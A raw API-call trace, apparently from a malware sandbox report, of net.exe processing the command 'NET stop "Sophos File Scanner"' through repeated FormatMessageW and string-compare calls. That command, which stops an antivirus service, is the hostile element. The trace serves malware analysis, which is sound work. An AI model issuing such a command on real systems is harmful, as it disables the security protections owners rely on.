dwLanguageId=0x0, lpBuffer=0x29f708, nSize=0x0, Arguments=0x29f704 | out: lpBuffer="唠0⡋盺)唠0)") returned 0x19 [0128.639] _wcsnicmp (_String1="NET stop “Sophos File Scanner", _String2="NET HELPMSG\r\nmessage#\r\n\r\n", _MaxCount=0x1d) returned 11 [0128.639] LocalFree (hMem=0x305520) returned 0x0 [0128.639] FormatMessageW (in: dwFlags=0x1900, lpSource=0x70040000, dwMessageId=0xc17, dwLanguageId=0x0, lpBuffer=0x29f708, nSize=0x0, Arguments=0x29f704 | out: lpBuffer="唠0⡋盺)唠0)") returned 0xc1 [0128.639] _wcsnicmp (_String1="NET stop “Sophos File Scanner", _String2="NET LOCALGROUP\r\n[groupname [/", _MaxCount=0x1d) returned 7 [0128.639] LocalFree (hMem=0x305520) returned 0x0 [0128.639] FormatMessageW (in: dwFlags=0x1900, lpSource=0x70040000, dwMessageId=0xc1a, dwLanguageId=0x0, lpBuffer=0x29f708, nSize=0x0, Arguments=0x29f704 | out: lpBuffer="唠0⡋盺)唠0)") returned 0x16 [0128.639] _wcsnicmp (_String1="NET stop “Sophos File Scanner", _String2="NET PAUSE\r\nservice\r\n\r\n", _MaxCount=0x1d) returned 3 [0128.639] LocalFree (hMem=0x305520) returned 0x0 [0128.639] FormatMessageW (in: dwFlags=0x1900, lpSource=0x70040000, dwMessageId=0xc1d, dwLanguageId=0x0, lpBuffer=0x29f708, nSize=0x0, Arguments=0x29f704 | out: lpBuffer="唠0⡋盺)唠0)") returned 0x33 [0128.639] _wcsnicmp (_String1="NET stop “Sophos File Scanner", _String2="NET SESSION\r\n[\\\\computername]", _MaxCount=0x1d) returned 15 [0128.639] LocalFree (hMem=0x305520) returned 0x0 [0128.639] FormatMessageW (in: dwFlags=0x1900, lpSource=0x70040000, dwMessageId=0xc20, dwLanguageId=0x0, lpBuffer=0x29f708, nSize=0x0, Arguments=0x29f704 | out: lpBuffer="唠0⡋盺)唠0)") returned 0x234 [0128.639] _wcsnicmp (_String1="NET stop “Sophos File Scanner", _String2="NET SHARE\r\nsharename\r\n ", _MaxCount=0x1d) returned 12 [0128.639] LocalFree (hMem=0x305520) returned 0x0 [0128.639] FormatMessageW (in: dwFlags=0x1900, lpSource=0x70040000, dwMessageId=0xc23, dwLanguageId=0x0, lpBuffer=0x29f708, nSize=0x0, Arguments=0x29f704 | out: lpBuffer="唠0⡋盺)唠0)") returned 0x13 [0128.639] _wcsnicmp (_String1="NET stop “Sophos File Scanner", _String2="NET START BROWSER\r\n", _MaxCount=0x1d) returned 14 [0128.639] LocalFree (hMem=0x305520) returned 0x0 [0128.639] FormatMessageW (in: dwFlags=0x1900, lpSource=0x70040000, dwMessageId=0xc26, dwLanguageId=0x0, lpBuffer=0x29f708, nSize=0x0, Arguments=0x29f704 | out: lpBuffer="唠0⡋盺)唠0)") returned 0x14 [0128.640] _wcsnicmp (_String1="NET stop “Sophos File Scanner", _String2="NET START CLIPBOOK\r\n", _MaxCount=0x1d) returned 14 [0128.640] LocalFree (hMem=0x305520) returned 0x0 [0128.640] FormatMessageW (in: dwFlags=0x1900, lpSource=0x70040000, dwMessageId=0xc29, dwLanguageId=0x0, lpBuffer=0x29f708, nSize=0x0, Arguments=0x29f704 | out: lpBuffer="唠0⡋盺)唠0)") returned 0x14 [0128.640] _wcsnicmp (_String1="NET stop “Sophos File Scanner", _String2="NET START EVENTLOG\r\n", _MaxCount=0x1d) returned 14 [0128.640] LocalFree (hMem=0x305520) returned 0x0 [0128.640] FormatMessageW (in: dwFlags=0x1900, lpSource=0x70040000, dwMessageId=0xc2c, dwLanguageId=0x0, lpBuffer=0x29f708, nSize=0x0, Arguments=0x29f704 | out: lpBuffer="唠0⡋盺)唠0)") returned 0x15 [0128.640] _wcsnicmp (_String1="NET stop “Sophos File Scanner", _String2="NET START MESSENGER\r\n", _MaxCount=0x1d) returned 14 [0128.640] LocalFree (hMem=0x305520) returned 0x0 [0128.640] FormatMessageW (in: dwFlags=0x1900, lpSource=0x70040000, dwMessageId=0xc2f, dwLanguageId=0x0, lpBuffer=0x29f708, nSize=0x0, Arguments=0x29f704 | out: lpBuffer="唠0⡋盺)唠0)") returned 0x15 [0128.640] _wcsnicmp (_String1="NET stop “Sophos File Scanner", _String2="NET START NET LOGON\r\n", _MaxCount=0x1d) returned 14 [0128.640] LocalFree (hMem=0x305520) returned 0x0 [0128.640] FormatMessageW (in: dwFlags=0x1900, lpSource=0x70040000, dwMessageId=0xc32, dwLanguageId=0x0, lpBuffer=0x29f708, nSize=0x0, Arguments=0x29f704 | out: lpBuffer="唠0⡋盺)唠0)") returned 0x16 [0128.640] _wcsnicmp (_String1="NET stop “Sophos File Scanner", _String2="NET START RPCLOCATOR\r\n", _MaxCount=0x1d) returned 14 [0128.640] LocalFree (hMem=0x305520) returned 0x0 [0128.640] FormatMessageW (in: dwFlags=0x1900, lpSource=0x70040000, dwMessageId=0xc35, dwLanguageId=0x0, lpBuffer=0x29f708, nSize=0x0, Arguments=0x29f704 | out: lpBuffer="唠0⡋盺)唠0)") returned 0x11 [0128.640] _wcsnicmp (_String1="NET stop “Sophos File Scanner", _String2="NET START RPCSS\r\n", _MaxCount=0x1d) returned 14 [0128.640] LocalFree (hMem=0x305520) returned 0x0 [0128.640] FormatMessageW (in: dwFlags=0x1900, lpSource=0x70040000, dwMessageId=0xc38, dwLanguageId=0x0, lpBuffer=0x29f708, nSize=0x0, Arguments=0x29f704 | out: lpBuffer="唠0⡋盺)唠0)") returned 0x14 [0128.640] _wcsnicmp (_String1="NET stop “Sophos File Scanner", _String2="NET START SCHEDULE\r\n", _MaxCount=0x1d) returned 14 [0128.640] LocalFree (hMem=0x305520) returned 0x0 [0128.640] FormatMessageW (in: dwFlags=0x1900, lpSource=0x70040000, dwMessageId=0xc3b, dwLanguageId=0x0, lpBuffer=0x29f708, nSize=0x0, Arguments=0x29f704 | out: lpBuffer="唠0⡋盺)唠0)") returned 0x12 [0128.640] _wcsnicmp (_String1="NET stop “Sophos File Scanner", _String2="NET START SERVER\r\n", _MaxCount=0x1d) returned 14 [0128.640] LocalFree (hMem=0x305520) returned 0x0 [0128.640] FormatMessageW (in: dwFlags=0x1900, lpSource=0x70040000, dwMessageId=0xc3e, dwLanguageId=0x0, lpBuffer=0x29f708, nSize=0x0, Arguments=0x29f704 | out: lpBuffer="唠0⡋盺)唠0)") returned 0xf [0128.640] _wcsnicmp (_String1="NET stop “Sophos File Scanner", _String2="NET START UPS\r\n", _MaxCount=0x1d) returned 14 [0128.640] LocalFree (hMem=0x305520) returned 0x0 [0128.641] FormatMessageW (in: dwFlags=0x1900, lpSource=0x70040000, dwMessageId=0xc41, dwLanguageId=0x0, lpBuffer=0x29f708, nSize=0x0, Arguments=0x29f704 | out: lpBuffer="唠0⡋盺)唠0)") returned 0x17 [0128.641] _wcsnicmp (_String1="NET stop “Sophos File Scanner", _String2="NET START WORKSTATION\r\n", _MaxCount=0x1d) returned 14 [0128.641] LocalFree (hMem=0x305520) returned 0x0 [0128.641] FormatMessageW (in: dwFlags=0x1900, lpSource=0x70040000, dwMessageId=0xc44, dwLanguageId=0x0, lpBuffer=0x29f708, nSize=0x0, Arguments=0x29f704 | out: lpBuffer="唠0⡋盺)唠0)") returned 0x18 [0128.641] _wcsnicmp (_String1="NET stop “Sophos File Scanner", _String2="NET START\r\n[service]\r\n\r\n", _MaxCount=0x1d) returned 14 [0128.641] LocalFree (hMem=0x305520) returned 0x0 [0128.641] FormatMessageW (in: dwFlags=0x1900, lpSource=0x70040000, dwMessageId=0xc47, dwLanguageId=0x0, lpBuffer=0x29f708, nSize=0x0, Arguments=0x29f704 | out: lpBuffer="唠0⡋盺)唠0)") returned 0x2a [0128.641] _wcsnicmp (_String1="NET stop “Sophos File Scanner", _String2="NET STATISTICS\r\n[WORKSTATION ", _MaxCount=0x1d) returned 14 [0128.641] LocalFree (hMem=0x305520) returned 0x0 [0128.641] FormatMessageW (in: dwFlags=0x1900, lpSource=0x70040000, dwMessageId=0xc4a, dwLanguageId=0x0, lpBuffer=0x29f708, nSize=0x0, Arguments=0x29f704 | out: lpBuffer="唠0⡋盺)唠0)") returned 0x15 [0128.641] _wcsnicmp (_String1="NET stop “Sophos File Scanner", _String2="NET STOP\r\nservice\r\n\r\n", _MaxCount=0x1d) returned 19 [0128.641] LocalFree (hMem=0x305520) returned 0x0 [0128.641] FormatMessageW (in: dwFlags=0x1900, lpSource=0x70040000, dwMessageId=0xc4d, dwLanguageId=0x0, lpBuffer=0x29f708, nSize=0x0, Arguments=0x29f704 | out: lpBuffer="唠0⡋盺)唠0)") returned 0x58 [0128.641] _wcsnicmp (_String1="NET stop “Sophos File Scanner", _String2="NET TIME\r\n\r\n[\\\\computername |", _MaxCount=0x1d) returned -1 [0128.641] LocalFree (hMem=0x305520) returned 0x0 [0128.641] FormatMessageW (in: dwFlags=0x1900, lpSource=0x70040000, dwMessageId=0xc50, dwLanguageId=0x0, lpBuffer=0x29f708, nSize=0x0, Arguments=0x29f704 | out: lpBuffer="唠0⡋盺)唠0)") returned 0x184 [0128.641] _wcsnicmp (_String1="NET stop “Sophos File Scanner", _String2="NET USE\r\n[devicename | *] [\\\\", _MaxCount=0x1d) returned -2 [0128.641] LocalFree (hMem=0x305520) returned 0x0 [0128.641] FormatMessageW (in: dwFlags=0x1900, lpSource=0x70040000, dwMessageId=0xc53, dwLanguageId=0x0, lpBuffer=0x29f708, nSize=0x0, Arguments=0x29f704 | out: lpBuffer="唠0⡋盺)唠0)") returned 0xc7 [0128.641] _wcsnicmp (_String1="NET stop “Sophos File Scanner", _String2="NET USER\r\n[username [password", _MaxCount=0x1d) returned -2 [0128.641] LocalFree (hMem=0x305520) returned 0x0 [0128.641] FormatMessageW (in: dwFlags=0x1900, lpSource=0x70040000, dwMessageId=0xc56, dwLanguageId=0x0, lpBuffer=0x29f708, nSize=0x0, Arguments=0x29f704 | out: lpBuffer="唠0⡋盺)唠0)") returned 0x47 [0128.641] _wcsnicmp (_String1="NET stop “Sophos File Scanner", _String2="NET VIEW\r\n[\\\\computername [/C", _MaxCount=0x1d) returned -3 [0128.641] LocalFree (hMem=0x305520) returned 0x0 [0128.641] FormatMessageW (in: dwFlags=0x1900, lpSource=0x70040000, dwMessageId=0xc59, dwLanguageId=0x0, lpBuffer=0x29f708, nSize=0x0, Arguments=0x29f704 | out: lpBuffer="唠0⡋盺)唠0)") returned 0xc2 [0128.641] _wcsnicmp (_String1="NET stop “Sophos File Scanner", _String2="NET\r\n [ ACCOUNTS | COMPUTE", _MaxCount=0x1d) returned 19 [0128.641] LocalFree (hMem=0x305520) returned 0x0 [0128.642] FormatMessageW (in: dwFlags=0x1900, lpSource=0x70040000, dwMessageId=0xc5c, dwLanguageId=0x0, lpBuffer=0x29f708, nSize=0x0, Arguments=0x29f704 | out: lpBuffer="唠0⡋盺)唠0)") returned 0x319 [0128.642] _wcsnicmp (_String1="NET stop “Sophos File Scanner", _String2="SERVICES\r\nNET START can be us", _MaxCount=0x1d) returned -5 [0128.642] LocalFree (hMem=0x305520) returned 0x0 [0128.642] FormatMessageW (in: dwFlags=0x1900, lpSource=0x70040000, dwMessageId=0xc5f, dwLanguageId=0x0, lpBuffer=0x29f708, nSize=0x0, Arguments=0x29f704 | out: lpBuffer="唠0⡋盺)唠0)") returned 0x483 [0128.642] _wcsnicmp (_String1="NET stop “Sophos File Scanner", _String2="SYNTAX\r\nThe following convent", _MaxCount=0x1d) returned -5 [0128.642] LocalFree (hMem=0x305520) returned 0x0 [0128.642] FormatMessageW (in: dwFlags=0x1900, lpSource=0x70040000, dwMessageId=0xc62, dwLanguageId=0x0, lpBuffer=0x29f708, nSize=0x0, Arguments=0x29f704 | out: lpBuffer="唠0⡋盺)唠0)") returned 0xa86 [0128.642] _wcsnicmp (_String1="NET stop “Sophos File Scanner", _String2="NAMES\r\nThe following types of", _MaxCount=0x1d) returned 4 [0128.642] LocalFree (hMem=0x305520) returned 0x0 [0128.642] FormatMessageW (in: dwFlags=0x1900, lpSource=0x70040000, dwMessageId=0xc65, dwLanguageId=0x0, lpBuffer=0x29f708, nSize=0x0, Arguments=0x29f704 | out: lpBuffer="唠0⡋盺)唠0)") returned 0x54 [0128.642] _wcsnicmp (_String1="NET stop “Sophos File Scanner", _String2="\r\nFor more information on too", _MaxCount=0x1d) returned 97 [0128.642] LocalFree (hMem=0x305520) returned 0x0 [0128.642] FormatMessageW (in: dwFlags=0x1900, lpSource=0x70040000, dwMessageId=0xbfc, dwLanguageId=0x0, lpBuffer=0x29f708, nSize=0x0, Arguments=0x29f704 | out: lpBuffer="唠0⡋盺)唠0)") returned 0xad [0128.642] _wcsnicmp (_String1="NET stop “Sophos File", _String2="NET ACCOUNTS\r\n[/FORCE", _MaxCount=0x15) returned 18 [0128.642] LocalFree (hMem=0x305520) returned 0x0 [0128.642] FormatMessageW (in: dwFlags=0x1900, lpSource=0x70040000, dwMessageId=0xbff, dwLanguageId=0x0, lpBuffer=0x29f708, nSize=0x0, Arguments=0x29f704 | out: lpBuffer="唠0⡋盺)唠0)") returned 0x2e [0128.642] _wcsnicmp (_String1="NET stop “Sophos File", _String2="NET COMPUTER\r\n\\\\compu", _MaxCount=0x15) returned 16 [0128.642] LocalFree (hMem=0x305520) returned 0x0 [0128.642] FormatMessageW (in: dwFlags=0x1900, lpSource=0x70040000, dwMessageId=0xc02, dwLanguageId=0x0, lpBuffer=0x29f708, nSize=0x0, Arguments=0x29f704 | out: lpBuffer="唠0⡋盺)唠0)") returned 0x7d [0128.642] _wcsnicmp (_String1="NET stop “Sophos File", _String2="NET CONFIG SERVER\r\n[/", _MaxCount=0x15) returned 16 [0128.642] LocalFree (hMem=0x305520) returned 0x0 [0128.642] FormatMessageW (in: dwFlags=0x1900, lpSource=0x70040000, dwMessageId=0xc05, dwLanguageId=0x0, lpBuffer=0x29f708, nSize=0x0, Arguments=0x29f704 | out: lpBuffer="唠0⡋盺)唠0)") returned 0x26 [0128.642] _wcsnicmp (_String1="NET stop “Sophos File", _String2="NET CONFIG\r\n[SERVER |", _MaxCount=0x15) returned 16 [0128.642] LocalFree (hMem=0x305520) returned 0x0 [0128.642] FormatMessageW (in: dwFlags=0x1900, lpSource=0x70040000, dwMessageId=0xc08, dwLanguageId=0x0, lpBuffer=0x29f708, nSize=0x0, Arguments=0x29f704 | out: lpBuffer="唠0⡋盺)唠0)") returned 0x19 [0128.643] _wcsnicmp (_String1="NET stop “Sophos File", _String2="NET CONTINUE\r\nservice", _MaxCount=0x15) returned 16 [0128.643] LocalFree (hMem=0x305520) returned 0x0 [0128.643] FormatMessageW (in: dwFlags=0x1900, lpSource=0x70040000, dwMessageId=0xc0b, dwLanguageId=0x0, lpBuffer=0x29f708, nSize=0x0, Arguments=0x29f704 | out: lpBuffer="唠0⡋盺)唠0)") returned 0x1b [0128.643] _wcsnicmp (_String1="NET stop “Sophos File", _String2="NET FILE\r\n[id [/CLOSE", _MaxCount=0x15) returned 13 [0128.643] LocalFree (hMem=0x305520) returned 0x0 [0128.643] FormatMessageW (in: dwFlags=0x1900, lpSource=0x70040000, dwMessageId=0xc0e, dwLanguageId=0x0, lpBuffer=0x29f708, nSize=0x0, Arguments=0x29f704 | out: lpBuffer="唠0⡋盺)唠0)") returned 0xbe [0128.643] _wcsnicmp (_String1="NET stop “Sophos File", _String2="NET GROUP\r\n[groupname", _MaxCount=0x15) returned 12 [0128.643] LocalFree (hMem=0x305520) returned 0x0 [0128.643] FormatMessageW (in: dwFlags=0x1900, lpSource=0x70040000, dwMessageId=0xc11, dwLanguageId=0x0, lpBuffer=0x29f708, nSize=0x0, Arguments=0x29f704 | out: lpBuffer="唠0⡋盺)唠0)") returned 0x33 [0128.643] _wcsnicmp (_String1="NET stop “Sophos File", _String2="NET HELP\r\ncommand\r\n ", _MaxCount=0x15) returned 11 [0128.643] LocalFree (hMem=0x305520) returned 0x0 [0128.643] FormatMessageW (in: dwFlags=0x1900, lpSource=0x70040000, dwMessageId=0xc14, dwLanguageId=0x0, lpBuffer=0x29f708, nSize=0x0, Arguments=0x29f704 | out: lpBuffer="唠0⡋盺)唠0)") returned 0x19 [0128.643] _wcsnicmp (_String1="NET stop “Sophos File", _String2="NET HELPMSG\r\nmessage#", _MaxCount=0x15) returned 11 [0128.643] LocalFree (hMem=0x305520) returned 0x0 [0128.643] FormatMessageW (in: dwFlags=0x1900, lpSource=0x70040000, dwMessageId=0xc17, dwLanguageId=0x0, lpBuffer=0x29f708, nSize=0x0, Arguments=0x29f704 | out: lpBuffer="唠0⡋盺)唠0)") returned 0xc1 [0128.643] _wcsnicmp (_String1="NET stop “Sophos File", _String2="NET LOCALGROUP\r\n[grou", _MaxCount=0x15) returned 7 [0128.643] LocalFree (hMem=0x305520) returned 0x0 [0128.643] FormatMessageW (in: dwFlags=0x1900, lpSource=0x70040000, dwMessageId=0xc1a, dwLanguageId=0x0, lpBuffer=0x29f708, nSize=0x0, Arguments=0x29f704 | out: lpBuffer="唠0⡋盺)唠0)") returned 0x16 [0128.643] _wcsnicmp (_String1="NET stop “Sophos File", _String2="NET PAUSE\r\nservice\r\n\r", _MaxCount=0x15) returned 3 [0128.643] LocalFree (hMem=0x305520) returned 0x0 [0128.643] FormatMessageW (in: dwFlags=0x1900, lpSource=0x70040000, dwMessageId=0xc1d, dwLanguageId=0x0, lpBuffer=0x29f708, nSize=0x0, Arguments=0x29f704 | out: lpBuffer="唠0⡋盺)唠0)") returned 0x33 [0128.643] _wcsnicmp (_String1="NET stop “Sophos File", _String2="NET SESSION\r\n[\\\\compu", _MaxCount=0x15) returned 15 [0128.643] LocalFree (hMem=0x305520) returned 0x0 [0128.643] FormatMessageW (in: dwFlags=0x1900, lpSource=0x70040000, dwMessageId=0xc20, dwLanguageId=0x0, lpBuffer=0x29f708, nSize=0x0, Arguments=0x29f704 | out: lpBuffer="唠0⡋盺)唠0)") returned 0x234 [0128.643] _wcsnicmp (_String1="NET stop “Sophos File", _String2="NET SHARE\r\nsharename\r", _MaxCount=0x15) returned 12 [0128.643] LocalFree (hMem=0x305520) returned 0x0 [0128.643] FormatMessageW (in: dwFlags=0x1900, lpSource=0x70040000, dwMessageId=0xc23, dwLanguageId=0x0, lpBuffer=0x29f708, nSize=0x0, Arguments=0x29f704 | out: lpBuffer="唠0⡋盺)唠0)") returned 0x13 [0128.644] _wcsnicmp (_String1="NET stop “Sophos File", _String2="NET START BROWSER\r\n", _MaxCount=0x15) returned 14 [0128.644] LocalFree (hMem=0x305520) returned 0x0 [0128.644] FormatMessageW (in: dwFlags=0x1900, lpSource=0x70040000, dwMessageId=0xc26, dwLanguageId=0x0, lpBuffer=0x29f708, nSize=0x0, Arguments=0x29f704 | out: lpBuffer="唠0⡋盺)唠0)") returned 0x14 [0128.644] _wcsnicmp (_String1="NET stop “Sophos File", _String2="NET START CLIPBOOK\r\n", _MaxCount=0x15) returned 14 [0128.644] LocalFree (hMem=0x305520) returned 0x0 [0128.644] FormatMessageW (in: dwFlags=0x1900, lpSource=0x70040000, dwMessageId=0xc29, dwLanguageId=0x0, lpBuffer=0x29f708, nSize=0x0, Arguments=0x29f704 | out: lpBuffer="唠0⡋盺)唠0)") returned 0x14 [0128.644] _wcsnicmp (_String1="NET stop “Sophos File", _String2="NET START EVENTLOG\r\n", _MaxCount=0x15) returned 14 [0128.644] LocalFree (hMem=0x305520) returned 0x0 [0128.644] FormatMessageW (in: dwFlags=0x1900, lpSource=0x70040000, dwMessageId=0xc2c, dwLanguageId=0x0, lpBuffer=0x29f708, nSize=0x0, Arguments=0x29f704 | out: lpBuffer="唠0⡋盺)唠0)") returned 0x15 [0128.644] _wcsnicmp (_String1="NET stop “Sophos File", _String2="NET START MESSENGER\r\n", _MaxCount=0x15) returned 14 [0128.644] LocalFree (hMem=0x305520) returned 0x0 [0128.644] FormatMessageW (in: dwFlags=0x1900, lpSource=0x70040000, dwMessageId=0xc2f, dwLanguageId=0x0, lpBuffer=0x29f708, nSize=0x0, Arguments=0x29f704 | out: lpBuffer="甠0⡋盺)唠0)") returned 0x15 [0128.644] _wcsnicmp (_String1="NET stop “Sophos File", _String2="NET START NET LOGON\r\n", _MaxCount=0x15) returned 14 [0128.644] LocalFree (hMem=0x307520) returned 0x0 [0128.644] FormatMessageW (in: dwFlags=0x1900, lpSource=0x70040000, dwMessageId=0xc32, dwLanguageId=0x0, lpBuffer=0x29f708, nSize=0x0, Arguments=0x29f704 | out: lpBuffer="锠0⡋盺)甠0)") returned 0x16 [0128.644] _wcsnicmp (_String1="NET stop “Sophos File", _String2="NET START RPCLOCATOR\r", _MaxCount=0x15) returned 14 [0128.644] LocalFree (hMem=0x309520) returned 0x0 [0128.644] FormatMessageW (in: dwFlags=0x1900, lpSource=0x70040000, dwMessageId=0xc35, dwLanguageId=0x0, lpBuffer=0x29f708, nSize=0x0, Arguments=0x29f704 | out: lpBuffer="锠0⡋盺)锠0)") returned 0x11 [0128.644] _wcsnicmp (_String1="NET stop “Sophos File", _String2="NET START RPCSS\r\n", _MaxCount=0x15) returned 14 [0128.644] LocalFree (hMem=0x309520) returned 0x0 [0128.644] FormatMessageW (in: dwFlags=0x1900, lpSource=0x70040000, dwMessageId=0xc38, dwLanguageId=0x0, lpBuffer=0x29f708, nSize=0x0, Arguments=0x29f704 | out: lpBuffer="锠0⡋盺)锠0)") returned 0x14 [0128.644] _wcsnicmp (_String1="NET stop “Sophos File", _String2="NET START SCHEDULE\r\n", _MaxCount=0x15) returned 14 [0128.644] LocalFree (hMem=0x309520) returned 0x0 [0128.644] FormatMessageW (in: dwFlags=0x1900, lpSource=0x70040000, dwMessageId=0xc3b, dwLanguageId=0x0, lpBuffer=0x29f708, nSize=0x0, Arguments=0x29f704 | out: lpBuffer="锠0⡋盺)锠0)") returned 0x12 [0128.645] _wcsnicmp (_String1="NET stop “Sophos File", _String2="NET START SERVER\r\n", _MaxCount=0x15) returned 14 [0128.645] LocalFree (hMem=0x309520) returned 0x0 [0128.645] FormatMessageW (in: dwFlags=0x1900, lpSource=0x70040000, dwMessageId=0xc3e, dwLanguageId=0x0, lpBuffer=0x29f708, nSize=0x0, Arguments=0x29f704 | out: lpBuffer="锠0⡋盺)锠0)") returned 0xf [0128.645] _wcsnicmp (_String1="NET stop “Sophos File", _String2="NET START UPS\r\n", _MaxCount=0x15) returned 14 [0128.645] LocalFree (hMem=0x309520) returned 0x0 [0128.645] FormatMessageW (in: dwFlags=0x1900, lpSource=0x70040000, dwMessageId=0xc41, dwLanguageId=0x0, lpBuffer=0x29f708, nSize=0x0, Arguments=0x29f704 | out: lpBuffer="锠0⡋盺)锠0)") returned 0x17 [0128.645] _wcsnicmp (_String1="NET stop “Sophos File", _String2="NET START WORKSTATION", _MaxCount=0x15) returned 14 [0128.645] LocalFree (hMem=0x309520) returned 0x0 [0128.645] FormatMessageW (in: dwFlags=0x1900, lpSource=0x70040000, dwMessageId=0xc44, dwLanguageId=0x0, lpBuffer=0x29f708, nSize=0x0, Arguments=0x29f704 | out: lpBuffer="锠0⡋盺)锠0)") returned 0x18 [0128.645] _wcsnicmp (_String1="NET stop “Sophos File", _String2="NET START\r\n[service]\r", _MaxCount=0x15) returned 14 [0128.645] LocalFree (hMem=0x309520) returned 0x0 [0128.645] FormatMessageW (in: dwFlags=0x1900, lpSource=0x70040000, dwMessageId=0xc47, dwLanguageId=0x0, lpBuffer=0x29f708, nSize=0x0, Arguments=0x29f704 | out: lpBuffer="锠0⡋盺)锠0)") returned 0x2a [0128.645] _wcsnicmp (_String1="NET stop “Sophos File", _String2="NET STATISTICS\r\n[WORK", _MaxCount=0x15) returned 14 [0128.645] LocalFree (hMem=0x309520) returned 0x0 [0128.645] FormatMessageW (in: dwFlags=0x1900, lpSource=0x70040000, dwMessageId=0xc4a, dwLanguageId=0x0, lpBuffer=0x29f708, nSize=0x0, Arguments=0x29f704 | out: lpBuffer="锠0⡋盺)锠0)") returned 0x15 [0128.645] _wcsnicmp (_String1="NET stop “Sophos File", _String2="NET STOP\r\nservice\r\n\r\n", _MaxCount=0x15) returned 19 [0128.645] LocalFree (hMem=0x309520) returned 0x0 [0128.645] FormatMessageW (in: dwFlags=0x1900, lpSource=0x70040000, dwMessageId=0xc4d, dwLanguageId=0x0, lpBuffer=0x29f708, nSize=0x0, Arguments=0x29f704 | out: lpBuffer="锠0⡋盺)锠0)") returned 0x58 [0128.645] _wcsnicmp (_String1="NET stop “Sophos File", _String2="NET TIME\r\n\r\n[\\\\comput", _MaxCount=0x15) returned -1 [0128.645] LocalFree (hMem=0x309520) returned 0x0 [0128.645] FormatMessageW (in: dwFlags=0x1900, lpSource=0x70040000, dwMessageId=0xc50, dwLanguageId=0x0, lpBuffer=0x29f708, nSize=0x0, Arguments=0x29f704 | out: lpBuffer="锠0⡋盺)锠0)") returned 0x184 [0128.645] _wcsnicmp (_String1="NET stop “Sophos File", _String2="NET USE\r\n[devicename ", _MaxCount=0x15) returned -2 [0128.645] LocalFree (hMem=0x309520) returned 0x0 [0128.645] FormatMessageW (in: dwFlags=0x1900, lpSource=0x70040000, dwMessageId=0xc53, dwLanguageId=0x0, lpBuffer=0x29f708, nSize=0x0, Arguments=0x29f704 | out: lpBuffer="锠0⡋盺)锠0)") returned 0xc7 [0128.645] _wcsnicmp (_String1="NET stop “Sophos File", _String2="NET USER\r\n[username [", _MaxCount=0x15) returned -2 [0128.645] LocalFree (hMem=0x309520) returned 0x0 [0128.645] FormatMessageW (in: dwFlags=0x1900, lpSource=0x70040000, dwMessageId=0xc56, dwLanguageId=0x0, lpBuffer=0x29f708, nSize=0x0, Arguments=0x29f704 | out: lpBuffer="锠0⡋盺)锠0)") returned 0x47 [0128.646] _wcsnicmp (_String1="NET stop “Sophos File", _String2="NET VIEW\r\n[\\\\computer", _MaxCount=0x15) returned -3 [0128.646] LocalFree (hMem=0x309520) returned 0x0 [0128.646] FormatMessageW (in: dwFlags=0x1900, lpSource=0x70040000, dwMessageId=0xc59, dwLanguageId=0x0, lpBuffer=0x29f708, nSize=0x0, Arguments=0x29f704 | out: lpBuffer="锠0⡋盺)锠0)") returned 0xc2 [0128.646] _wcsnicmp (_String1="NET stop “Sophos File", _String2="NET\r\n [ ACCOUNTS |", _MaxCount=0x15) returned 19 [0128.646] LocalFree (hMem=0x309520) returned 0x0 [0128.646] FormatMessageW (in: dwFlags=0x1900, lpSource=0x70040000, dwMessageId=0xc5c, dwLanguageId=0x0, lpBuffer=0x29f708, nSize=0x0, Arguments=0x29f704 | out: lpBuffer="锠0⡋盺)锠0)") returned 0x319 [0128.646] _wcsnicmp (_String1="NET stop “Sophos File", _String2="SERVICES\r\nNET START c", _MaxCount=0x15) returned -5 [0128.646] LocalFree (hMem=0x309520) returned 0x0 [0128.646] FormatMessageW (in: dwFlags=0x1900, lpSource=0x70040000, dwMessageId=0xc5f, dwLanguageId=0x0, lpBuffer=0x29f708, nSize=0x0, Arguments=0x29f704 | out: lpBuffer="锠0⡋盺)锠0)") returned 0x483 [0128.646] _wcsnicmp (_String1="NET stop “Sophos File", _String2="SYNTAX\r\nThe following", _MaxCount=0x15) returned -5 [0128.646] LocalFree (hMem=0x309520) returned 0x0 [0128.646] FormatMessageW (in: dwFlags=0x1900, lpSource=0x70040000, dwMessageId=0xc62, dwLanguageId=0x0, lpBuffer=0x29f708, nSize=0x0, Arguments=0x29f704 | out: lpBuffer="锠0⡋盺)锠0)") returned 0xa86 [0128.646] _wcsnicmp (_String1="NET stop “Sophos File", _String2="NAMES\r\nThe following ", _MaxCount=0x15) returned 4 [0128.646] LocalFree (hMem=0x309520) returned 0x0 [0128.646] FormatMessageW (in: dwFlags=0x1900, lpSource=0x70040000, dwMessageId=0xc65, dwLanguageId=0x0, lpBuffer=0x29f708, nSize=0x0, Arguments=0x29f704 | out: lpBuffer="锠0⡋盺)锠0)") returned 0x54 [0128.646] _wcsnicmp (_String1="NET stop “Sophos File", _String2="\r\nFor more informatio", _MaxCount=0x15) returned 97 [0128.646] LocalFree (hMem=0x309520) returned 0x0 [0128.647] FormatMessageW (in: dwFlags=0x1900, lpSource=0x70040000, dwMessageId=0xbfc, dwLanguageId=0x0, lpBuffer=0x29f708, nSize=0x0, Arguments=0x29f704 | out: lpBuffer="锠0⡋盺)锠0)") returned 0xad [0128.647] _wcsnicmp (_String1="NET stop “Sophos", _String2="NET ACCOUNTS\r\n[/", _MaxCount=0x10) returned 18 [0128.647] LocalFree (hMem=0x309520) returned 0x0 [0128.647] FormatMessageW (in: dwFlags=0x1900, lpSource=0x70040000, dwMessageId=0xbff, dwLanguageId=0x0, lpBuffer=0x29f708, nSize=0x0, Arguments=0x29f704 | out: lpBuffer="锠0⡋盺)锠0)") returned 0x2e [0128.647] _wcsnicmp (_String1="NET stop “Sophos", _String2="NET COMPUTER\r\n\\\\", _MaxCount=0x10) returned 16 [0128.647] LocalFree (hMem=0x309520) returned 0x0 [0128.647] FormatMessageW (in: dwFlags=0x1900, lpSource=0x70040000, dwMessageId=0xc02, dwLanguageId=0x0, lpBuffer=0x29f708, nSize=0x0, Arguments=0x29f704 | out: lpBuffer="锠0⡋盺)锠0)") returned 0x7d [0128.647] _wcsnicmp (_String1="NET stop “Sophos", _String2="NET CONFIG SERVE", _MaxCount=0x10) returned 16 [0128.647] LocalFree (hMem=0x309520) returned 0x0 [0128.647] FormatMessageW (in: dwFlags=0x1900, lpSource=0x70040000, dwMessageId=0xc05, dwLanguageId=0x0, lpBuffer=0x29f708, nSize=0x0, Arguments=0x29f704 | out: lpBuffer="锠0⡋盺)锠0)") returned 0x26 [0128.647] _wcsnicmp (_String1="NET stop “Sophos", _String2="NET CONFIG\r\n[SER", _MaxCount=0x10) returned 16 